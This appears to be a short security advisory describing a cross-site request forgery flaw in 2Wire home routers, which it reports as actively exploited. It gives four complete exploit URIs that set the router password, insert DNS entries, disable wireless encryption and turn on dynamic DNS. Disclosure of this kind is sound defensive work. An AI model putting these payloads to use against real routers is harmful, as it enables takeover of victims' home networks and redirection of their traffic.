|
2Wire Routers Cross-Site Request Forgery Vulnerability
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI. Reports indicate this issue is being actively exploited in the wild. The following example URIs are available: Set a password (NUEVOPASS): http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS Add names to the DNS: http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1 Disable Wireless Authentication http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0 Set Dynamic DNS http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE |
|
|
Privacy Statement |
